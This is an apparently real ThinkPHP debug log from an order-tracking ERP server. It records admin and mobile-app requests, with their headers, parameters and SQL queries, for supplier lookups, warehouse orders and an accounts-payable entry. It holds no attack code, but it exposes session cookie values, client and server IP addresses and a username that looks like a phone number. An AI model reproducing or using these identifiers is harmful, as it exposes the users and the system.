app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:34:29+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.049715s][吞吐率:20.11req/s] [内存消耗:4,963.04kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001307s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001626s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007390s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000415s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000893s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000488s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000418s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000824s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701269) [ RunTime:0.005514s ] --------------------------------------------------------------- [ 2025-12-14T16:34:30+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.049273s][吞吐率:20.30req/s] [内存消耗:4,963.07kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001515s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007424s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000491s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001082s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000406s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000472s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000604s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701270) [ RunTime:0.005520s ] --------------------------------------------------------------- [ 2025-12-14T16:34:33+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.049609s][吞吐率:20.16req/s] [内存消耗:4,963.08kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001539s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007038s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000543s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000949s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000407s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000404s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000667s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701273) [ RunTime:0.005254s ] --------------------------------------------------------------- [ 2025-12-14T16:35:04+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [运行时间:0.075543s][吞吐率:13.24req/s] [内存消耗:5,464.64kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001123s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001476s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000406s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000832s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000727s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000561s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000937s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000740s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.024472s ] --------------------------------------------------------------- [ 2025-12-14T16:35:08+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019448s][吞吐率:51.42req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001191s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:35:08+08:00 ] 39.144.91.198 POST /api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [运行时间:0.070823s][吞吐率:14.12req/s] [内存消耗:4,757.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001598s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000567s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000822s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000320s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000949s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000664s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1765701308>orderinfo.end_time desc,1765701308>orderinfo.end_time desc,1765701308-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.025350s ] --------------------------------------------------------------- [ 2025-12-14T16:35:08+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019907s][吞吐率:50.23req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001177s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:35:09+08:00 ] 106.112.204.117 POST /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.062171s][吞吐率:16.08req/s] [内存消耗:5,503.95kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001092s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '236', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '4', 'suppliercustomer_id' => '65', 'worker_id' => '', 'explain' => '氧化费', 'money' => '9744', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001470s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006490s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000441s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000954s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000407s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000641s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001011s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000840s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000500s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000735s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000329s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (4 , 65 , 0 , '氧化费' , 9744 , 40 , 2025 , 12 , 14 , 1765701309 , 1765701309 , 584426.715) [ RunTime:0.005539s ] [ sql ] [ SQL ] SHOW COLUMNS 